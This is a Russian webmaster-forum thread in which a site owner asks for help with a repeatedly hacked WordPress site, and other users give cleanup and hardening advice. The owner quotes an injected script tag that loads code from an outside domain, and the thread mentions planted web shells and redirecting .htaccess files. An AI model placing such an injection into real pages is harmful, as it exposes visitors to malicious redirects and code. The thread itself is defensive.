Никто не может победить вирусы на сайте. Помогите, пожалуйста

12
I
На сайте с 02.12.2009
Offline
71
2661

Сайт два месяца подвергается взломам. И, верите, ничего не можем сделать. Постоянно переадресации на девочки.сз на отсос.ру , мобильная переадресация на обновление оперы и тп.

Обращались к специалистам, никто не мог помочь. Потом нашли, вроде, серьезного специалиста. Он - единственный, кто смог это остановить. Обновил движок, ужесточил права, что-то там зашил, сказал перенести на vps (правда, с партнерской ссылкой, ну да ладно). Взял 4400 руб. Неделю после "уборки" у него был период беспл поддержки. Потом пришло письмо, что поддержка закончилась, но за 4400 в месяц можно обеспечить круглосуточный контроль.

В день получения письма сайт снова был взломан. Сейчас снова перенаправления на проституток, снова упала на 30% посещаемость, траст, снова санкции поисковиков. Денег потеряли немеряно.

Он говорит, что дело во мне, что только через фтп возможно это сделать. Но я меняю пароли несколько раз в день, и уже их даже не помню просто. Ни у кого нет доступа к моему нетбуку. Комп проверен авастом и Dr web cure it вчера и нет ничего.

Его работа по недельной безопасности за 4400 руб закончилась.

Я руками чистила сайт от скрипта

<script src=http://megastroy86.ru/tr.php></script>

на каждой странице

но то ли он еще где-то остался, то ли он прописывается сам.

В .htaccess так и висит переадресация на opera123.net - я стираю, она появляется снова.

Вчера просто парень с фри-ланса за 250 рублей удалил очередную хакерскую закладку, при том, что сайт только про прошел процесс у дорогого спеца.

Тот спец говорит "за ваш сайт очень серьезно взялись". Иногда в комментариях приходит "hack again"?

Я только не понимаю, нахрена перенаправлять с чисто женского сайта на отсос ру? конвертация нулевая.

Последний раз в spb.devochki.ru рефферал был pund

Два месяца продолжается этот кошмар. Главное, что потеряно много денег, репутация, и никто не может помочь.

что-нам-делать?

дятел
На сайте с 03.03.2012
Offline
5
#1

может быть что угодно

у вас у самой какой стоит антивирус? (пользуйтесь каспером...)

что за движок? если самописный то это неконтролируемый вариант...))

еще совет убейте этот мегастрой86. просто пожалуйтесь везде напишите хостеру, домейнеру чтобы убили ли этот домен или этот пхп или ява на хосте там)))

чото както так...
Creative Team
На сайте с 23.04.2012
Offline
17
#2

У вас шелл на сайте залит! У меня была такая же ситуация! В каждой папке был залит хакерский .htaccess перенаправляющий, 404, 502 ошибки на свои порнушные сайты. Также везде в футере понапихали ссылки свои. При попытке удаления .htaccess через пару минут он появлялся снова!

Мне помог скрипт ai-bolit, погуглите и найдете без труда. Здесь на форуме его тоже обсуждали.

C помощью его нашел шелл с помощью которого заливали файлы и меняли права доступа к папкам. Удалил шелл, потом выставил минимальные права доступа на папки - закрыл все на запись. Почистил файлы от ссылок и все прекратилось!

И еще в панели хостинга отключите возможность доступа к сайту по FTP, пароли воруют очень легко, особенно из Total Commander/

Помогу избавиться от вирусов, шеллов, айфреймов, скрытых ссылок и всякой нечисти на ваших сайтах (/ru/forum/835493)
I
На сайте с 02.12.2009
Offline
71
#3

Спасибо, посмотрю этот скрипт. Движок вордпресс. Антивирус Avast Internet Security. Вчера сканировала Dr Web cure it.

Дело в том, что все шеллы удалил тот спец, он говорит, что новые мне залили по фтп. Мы только в хронологии с ним расходимся, тк пароль фтп был у меня и до окончания периода поддержки, когда все было нормально. Но я не претендую. В безопасности ноль.

Как убить мегастрой? Сделать это можно только по решению суда, или я ошибаюсь?

Вообще, я реально не понимаю, зачем жещин перенаправлять на проституток, ну не слелают они ни одного заказа, ну что за бред вообще.

Оксиген
На сайте с 30.07.2006
Offline
424
#4

1. Сохранить базу данных сайта.

2. Сменить хостинг.

3. Сменить провайдера услуг (айтишника).

4. Переустановить систему на рабочем компьютере с заведомо легальных копий. Самый простой способ винда + штатный бесплатный антивирус. Можно поставить линукс.

5. Установить на сайт движок с нуля, с заведомо достоверного дистрибутива.

6. Восстановить данные со старого сайта.

7. Не использовать нигде одинаковые пароли.

8. Не устанавливать пиратские фтп-клиенты и подобный Г-софт.

9. Работать в дальнейшем с нормальными специалистами.

Магазин готовых сайтов (https://www.bdb.ru/shop/) Продление доменов в RU-CENTER по партнерским тарифам.
temniy
На сайте с 15.03.2008
Offline
218
#5

Шелл можно найти и по другому - поставьте антивирус нормальный, во-первых. Аваст - жуткое глючное гуано. Поставьте бесплатную Avira - http://www.avira.com/ , потом скачайте по фтп весь сайт и прогоните по этой папке проверку. Наверняка найдете много интересного.

А насчет того, в чем смысл - может это конкуренты так вас топят.

⭐ Лучший хостинг от 0.8 евро, VPS от 4 евро, VPN недорого - разные локации - любые карты - https://fornex.com/c/ffi2e3/ru/services/
R
На сайте с 24.01.2008
Offline
180
#6

Все ваши признаки похоже на наличие шелла или дырявый хост, вы пробывали хост менять?

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
I
На сайте с 02.12.2009
Offline
71
#7

Хост да, поменяли. На тот, который порекомендовал удаливший все специалист.

Я хочу понять, каким образом у меня воруются из фтп пароли, если две программы мне говорят, что ничего не обнаружено.

DV
На сайте с 01.05.2010
Offline
644
#8

Антивирус — не гарантия безопасности.

Ещё раз. Антивирус — не гарантия безопасности.

Понятно?

Повышать культуру пользования вычислительной техникой, прежде всего.

VDS хостинг ( http://clck.ru/0u97l ) Нет нерешаемых задач ( https://searchengines.guru/ru/forum/806725 ) | Перенос сайтов на Drupal 7 с любых CMS. ( https://searchengines.guru/ru/forum/531842/page6#comment_10504844 )
R
На сайте с 24.01.2008
Offline
180
#9
istore:
Хост да, поменяли. На тот, который порекомендовал удаливший все специалист.


Я хочу понять, каким образом у меня воруются из фтп пароли, если две программы мне говорят, что ничего не обнаружено.

Вы уверенны, что не переносите шеллл вместе с сайтом?

Devvver
На сайте с 02.07.2008
Offline
640
#10
istore:
Движок вордпресс.

проверьте, обновлен ли Timthumb.php у вас, если он используется

Мой блог. Все о создании сайтов,Seo и СДЛ ( https://devvver.ru/ ) Мой телеграм канал https://t.me/seobloggers
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий